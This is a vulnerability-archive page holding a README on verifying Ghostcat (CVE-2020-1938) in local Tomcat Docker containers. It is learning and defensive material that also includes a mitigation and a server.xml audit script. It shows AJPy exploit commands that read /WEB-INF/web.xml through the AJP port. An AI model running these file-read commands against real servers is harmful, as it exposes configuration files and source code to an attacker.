Related vulnerability
Title:
Apache Tomcat security vulnerability
(CVE-2020-1938)
Description: Apache Tomcat is a lightweight web application server from the Apache Foundation (USA). It implements support for Servlets and JavaServer Pages (JSP). The Tomcat AJP protocol in Apache Tomcat 7.* versions before 7.0.100, 8.* versions before 8.5.51 and 9.* versions before 9.0.31 contains a security vulnerability. An attacker can exploit it to read or include arbitrary files under any webapp directory on the Tomcat server, such as webapp configuration files or source code.
Description
Learnings on how to verify if vulnerable to Ghostcat (aka CVE-2020-1938)
Introduction
# Ghostcat verification (CVE-2020-1938)
## Summary
A new exploit called Ghostcat has been found [CVE-2020-1938], see the articles on [snyk] and [tenable] for details and analysis of the exploit itself.
In my case, I wanted to verify which Tomcat servers are exploitable and, if so, how it manifests itself. So this experiment is to check Tomcat 7, 8 and 9.
## Prerequisites
- docker
- python
- git
## Reading file using CVE-2020-1938 on Tomcat 7
>TODO: How to verify a Tomcat 7 is vulnerable?
## Reading file using CVE-2020-1938 on Tomcat 8
Rather than testing exploits on live servers, I am using existing builds of Tomcat to perform my experiment using [AJPy] which crafts AJP requests in order to communicate with AJP connectors.
```bash
git clone --recurse-submodules git@github.com:shaunmclernon/ghostcat-verification.git
cd ghostcat-verification/AJPy
docker run --name tomcat --rm -d -p 8080:8080 -p 8009:8009 tomcat:8.5.32
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat
```
If it returns the web.xml then this version of Tomcat is vulnerable to the exploit.
If we try the same test using the latest version of Tomcat 8.5 we can see it is not vulnerable to this particular error.
```bash
docker run --name tomcat --rm -d -p 8080:8080 -p 8009:8009 tomcat:8.5
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat
```
In this case, we should get a Python error, which actually means the server is not vulnerable:
```bash
Traceback (most recent call last):
File "tomcat.py", line 377, in <module>
hdrs, data = bf.perform_request("/" + args.webapp + "/xxxxx.jsp", attributes=attributes)
...
...
struct.error: unpack requires a buffer of 5 bytes
```
## Reading file using CVE-2020-1938 on Tomcat 9
>TODO: How to verify a Tomcat 9 is vulnerable?
## Springboot
>TODO: How to verify a springboot service is vulnerable?
### Mitigation
Obviously, if vulnerable (regardless of the version), you should consider upgrading to the patched versions. One other option is to block access to the AJP port.
Start the same Tomcat version but do not expose the AJP port 8009.
```bash
docker run --name tomcat --rm -d -p 8080:8080 tomcat:8.5.32
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat
```
In this case, we can see that it will fail to exploit the server.
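To turn the two mitigations above into something repeatable, here is an added example (not part of this repo or of AJPy) that checks a Tomcat version string against the fixed releases named in the advisory and audits a `server.xml` for an AJP connector that is reachable from outside without a shared secret. It assumes the standard Tomcat `Connector` attributes `protocol`, `port`, `address`, `secretRequired` and `secret`; the two XML samples are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

# Fixed releases as stated in the advisory: anything older in the same major line is affected.
FIXED = {7: (7, 0, 100), 8: (8, 5, 51), 9: (9, 0, 31)}


def version_is_vulnerable(version):
    """True when a Tomcat 7.x/8.x/9.x version string predates its CVE-2020-1938 fix."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    fixed = FIXED.get(parts[0])
    return fixed is not None and parts < fixed


def audit_ajp_connectors(server_xml):
    """Return one finding per enabled AJP connector that is network-reachable and has no secret."""
    findings = []
    # Commented-out connectors (the patched default) are dropped by the XML parser, i.e. treated as disabled.
    for c in ET.fromstring(server_xml).iter("Connector"):
        if not c.get("protocol", "HTTP/1.1").upper().startswith("AJP"):
            continue
        address = c.get("address", "0.0.0.0")  # Tomcat binds all interfaces when address is absent
        exposed = address not in ("127.0.0.1", "::1", "localhost")
        no_secret = not c.get("secret") or c.get("secretRequired", "true").lower() == "false"
        if exposed and no_secret:
            findings.append("AJP connector on port %s bound to %s without a secret"
                            % (c.get("port", "?"), address))
    return findings


# Constructed samples: the pre-8.5.51 default connector, and one hardened the way patched releases ship.
DEFAULT_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
</Service></Server>"""

HARDENED_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/> -->
  <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
             secretRequired="true" secret="PLACEHOLDER-change-me"/>
</Service></Server>"""

if __name__ == "__main__":
    for ver in ("8.5.32", "8.5.51"):
        print(ver, "vulnerable" if version_is_vulnerable(ver) else "fixed")
    for name, xml in (("default", DEFAULT_XML), ("hardened", HARDENED_XML)):
        print(name, audit_ajp_connectors(xml) or "no exposed unauthenticated AJP connector")
```

The `tomcat:8.5.32` image used above ships the default connector, which is why the port mapping `-p 8009:8009` is all it takes to reach it; dropping that mapping is the container equivalent of the `address` restriction checked here.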
## Disclaimer
I am not a security professional and this repo was built for my learning purposes; it is not intended to be used for malicious purposes.
[CVE-2020-1938]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938
[snyk]: https://snyk.io/blog/ghostcat-breach-affects-all-tomcat-versions/
[tenable]: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
[AJPy]: https://github.com/hypn0s/AJPy
File snapshot
[4.0K] /data/pocs/62ff185deccce0cc75a03f992137e2ea511da21a
├── [4.0K] AJPy
└── [2.8K] README.md
1 directory, 1 file
Notes
1. It is recommended to access the original source first.
2. If the source is unavailable or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.